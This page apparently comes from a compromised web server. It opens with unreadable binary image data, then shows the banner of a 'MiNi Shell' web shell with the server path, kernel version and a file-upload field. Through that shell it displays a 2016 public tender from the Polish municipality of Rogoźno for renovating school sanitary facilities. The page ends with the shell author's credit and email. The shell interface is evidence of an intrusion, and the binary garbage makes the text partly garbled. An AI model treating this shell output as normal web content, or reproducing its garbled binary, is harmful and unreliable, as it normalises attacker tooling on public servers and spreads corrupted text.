JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160615/86815-N-2016.html

<p class="kh_header"><b>Rogoźno: Remont sanitariatów w Szkołach Podstawowych na terenie
                                           Gminy Rogoźno

Zadanie Nr 1 Remont pionu kanalizacyjnego i sanitariatów w Szkole  
                         Podstawowej  nr 3 w Rogoźnie 
Zadanie Nr 2 Remont łazienek w Szkole Podstawowej im. Adama Mickiewicza 
                         w Budziszewku</b><br>
<b>Numer ogłoszenia: 86815 - 2016; data zamieszczenia: 15.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogoźno , ul. Nowa 2, 64-610 Rogoźno, woj. wielkopolskie, tel. 67 26 84 400, faks 67 26 18 075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rogozno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sanitariatów w Szkołach Podstawowych na terenie
                                           Gminy Rogoźno

Zadanie Nr 1 Remont pionu kanalizacyjnego i sanitariatów w Szkole  
                         Podstawowej  nr 3 w Rogoźnie 
Zadanie Nr 2 Remont łazienek w Szkole Podstawowej im. Adama Mickiewicza 
                         w Budziszewku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje
Zadanie nr 1
remont sanitariatów na parterze,1 i 2 piętrze
w.c. chłopców i dziewczynek  i  w.c. dla osoby niepełnosprawnej
Roboty rozbiórkowe
1.  rozebranie ścianki z cegieł gr. ? ceg.  44,631 m2,
2.  rozebranie wykładziny ściennej z płytek  363,132 m3,
3.  wykucie z muru ościeżnic okiennych drewnianych  25,284 m3,
4.  wykucie otworów w ścianach z cegieł dla otworów drzwiowych  2,0 m2,
5.  wywiezienie gruzu  na odl. 1 km.  11,538 m3,
6.  za każdy następny km.   krotność 6   11,538 m3,
7.  demontaż pisuaru 9,0 szt,
8.  demontaż umywalki  21,0 szt,
9.  demontaż baterii umywalkowej i zmywakowej  21,0 szt,
10.demontaż ustępu  21,0 szt,
11.demontaż rurociągu żeliwnego kanalizacyjnego 67,26 m,
12.demontaz podejścia odpływowego  52,0 m,
13.wykucie z muru ościeżnic stalowych 20,0 szt,
14.demontaż grzejnika żeliwnego 12,0 szt,
Roboty budowlane
15.ścianki ustępowe z profili i okuć aluminiowych, wypełnione płytą laminowaną  62,40 m2,
16.licowanie ścian płytkami 342,72 m2,
17.okna z PCV 6 szt. o pow. 25,284 m2,
18.posadzki z płytek  15,00 m2,
19.dwukrotne malowanie farbami emulsyjnymi sufitów  97,521 m2,
20. j.w. lecz ścian  206,472m2,
21.uzupełnienie ścian 0,394 m3,
22.obsadzenie ościeżnic drewnianych  2,050 m2,
Roboty sanitarne
23.montaż rurociągu PCV o śr. 110mm  52,560 m,
24.dodatek za wykonanie podejść odpływowych  52,0 szt,
25.montaż umywalki  22,0 szt,
26.baterie umywalkowe  22,0 szt,
27.montaż ustępu kompakt 23,0 szt,
28.pisuary pojedyncze z płuczką 6,0 szt,
29.konwektory stalowe  12,0 szt,
30.montaż miski ustępowej dla osób niepełnosprawnych 
      stelaż, miska ustępowa, spłuczka 1,0 kpl
31.montaż poręczy dla osób niepełnosprawnych 2,0 szt,
Roboty elektryczne
32.demontaż opraw żarowych 27,0 szt,
33.montaż opraw zawieszanych  żarowych  21,0 szt,
34.wypusty na gniazdo  do  montażu  suszarki do rąk  10,0 szt.
35.przerobienie istniejącej instalacji elektrycznej 7,0 kpl,
      istnieją po 2 wypusty sufitowe  na oprawy żarowe  przerobić na 1 wypust

Zadanie Nr 2
Remont sanitariatów w.c .męskie i damskie
Roboty rozbiórkowe
1. roboty ziemne poprzeczne z wbudowaniem ziemi w nasyp kat. gruntu III m3. 2,880
2. przebicie otworów w ścianach z cegieł o grubości 1 1/2 ceg. szt.  1.00	  	
3. zasypywanie wykopów o ścianach pionowych o szerokości 0.8-2.5 m i głębokości do 1.5      m w gruncie kat. IV m3	2.80	
4. demontaż baterii umywalkowej i zmywakowej	szt. 4.00
5. demontaż umywalki  kpl.	4.00
6. demontaż ustępu z miską fajansową  kpl.	  5.00	
7. demontaż baterii natryskowej  szt	 2.00	
8. demontaż brodzika lub basenu natryskowego krotność  0.6  kpl. 2.00	
9. demontaż kompletnego urządzenia do podgrzewania wody bojlera	kpl. 2.00
10.demontaż rurociągu z PCW o śr. 75 110 mm na ścianie  m  69.00
11.demontaż grzejnika  kpl.	3.00
12.rozebranie okładziny ściennej z płytek ceramicznych	m2  64.68
13.rozebranie posadzek z płytek ceramicznych  m2  23.32
14.demontaż opraw oświetleniowych  szt.	8.00
15.demontaż nieuszczelnionego łącznika 	szt.  4.00
16.demontaż gniazd instalacyjnych wtykowych  szt. 6.00
17.demontaż przewodów układanych pod tynkiem  m  126.00
18.zeskrobanie i zmycie starej farby  m2	66.28
19.wykucie z muru i wstawienie nowych okien  m2 3.50
20.wykucie z muru i wstawienie nowych drzwi płytowych  m2  5.04
21.wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na odległość do 1   km  krotność  4	m3  7.60
Roboty budowlane
22.ułożenie nadproży prefabrykowanych  m 4,80
23.przecieranie istniejących tynków zewnętrznych  m2	130.96
24.dwukrotne malowanie farbami emulsyjnymi starych tynków  sufitów	m2  23.32
25.dwukrotne malowanie farbami emulsyjnymi starych tynków  ścian	m2  43.96
26.licowanie ścian płytkami ceramicznymi mocowanymi na klej	m2	64.68
27.posadzki płytkowe z kamieni sztucznych  układane na klej   m2 23.32
28.ścianki ustępowe	z profili aluminiowych, wypełnione płyta laminowaną m2	 25.20
Roboty elektryczne
29.wypusty wykonywane przewodami wtynkowymi  na wyłącznik  wyp.	4.00
30.wypusty wykonywane przewodami wtynkowymi na gniazdo  wyp. 6.00
31.wypusty wykonywane przewodami wtynkowymi na gniazdo wtykowe 2 bieg. 10A i 
     10A/Z wyp. 8.00
32.montaż opraw oświetleniowych zawieszanych żarowych  kpl.	8.00
Roboty wod-kan i c.o.
33.montaż grzejnika 120 x 60 kpl.	3.00
34.rurociągi wod.-kan. wraz z przeróbkami	 kpl.	2.00
35.urządzenia do podgrzewania wody ze zbiornikami o poj. 150 dm3	kpl.	2.00
36.montaż brodzików natryskowych z tworzywa sztucznego z kabiną	kpl.	2.00
37.baterie natryskowe z natryskiem ręcznym o śr. 15 mm	szt.	2.00
38.montaż ustępów pojedynczych z płuczkami z tworzyw sztucznych lub porcelany kompakt      kpl.	 5.00
39.montaż umywalek pojedyńczych porcelanowych z syfonem gruszkowym  szt. 4.00
40.baterie umywalkowe lub zmywakowe ścienne o śr. nom. 15 mm  szt. 	4.00.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.43.10.00-7, 45.44.21.00-8, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 3 000,- zł (słownie: trzy tysiące zł.00/100) w formach przewidzianych w ustawie z dni 29 stycznia 2004 r. Prawo Zamówień Publicznych art. 45.
Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Gminy Rogoźno, ul. Nowa 2,64-610 Rogoźno  
Bank: BS Czarnków, o/Rogoźno,
Nr konta 56 8951 0009 3900 0114 2000 0020
Do oferty należy załączyć potwierdzenie dokonania operacji.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty:
    - aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji 
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
      do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający 
     żąda załączenia do oferty:
   - wykazu tożsamych robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres 
     prowadzenia działalności jest krótszy - w tym okresie  z podaniem ich wartości, przedmiotu, dat 
     wykonania i odbiorców wraz z załączeniem dokumentu    potwierdzającego, ze roboty te zostały 
     wykonane w sposób należyty minimum 3 roboty o minimalnej wartości 100 000,-- zł brutto  
     każda    - wg. załącznika nr 4 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty:
    - wykazu osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności 
      odpowiedzialnych za świadczenie robót, pełniących funkcje kierowników robót,
      wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnego 
      do wykonania  zamówienia, a także zakresu wykonywanych przez nie czynności 
      oraz informacją o podstawie do dysponowania tymi  osobami zał. nr 6 do SIWZ,
             - min 1 osoba  o specjalności w branży budowlanej,
             - min 1 osoba o specjalności w branży  sanitarnej - wod-kan,
             - min 1 osoba  o specjalności w branży elektrycznej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rogozno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rogoźnie ul. Nowa 2,  64-610 Rogoźno  pok. nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 09:45, miejsce: Urząd Miejski w Rogoźnie ul. Nowa 2,  64-610 Rogoźno  pok. nr 15  Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com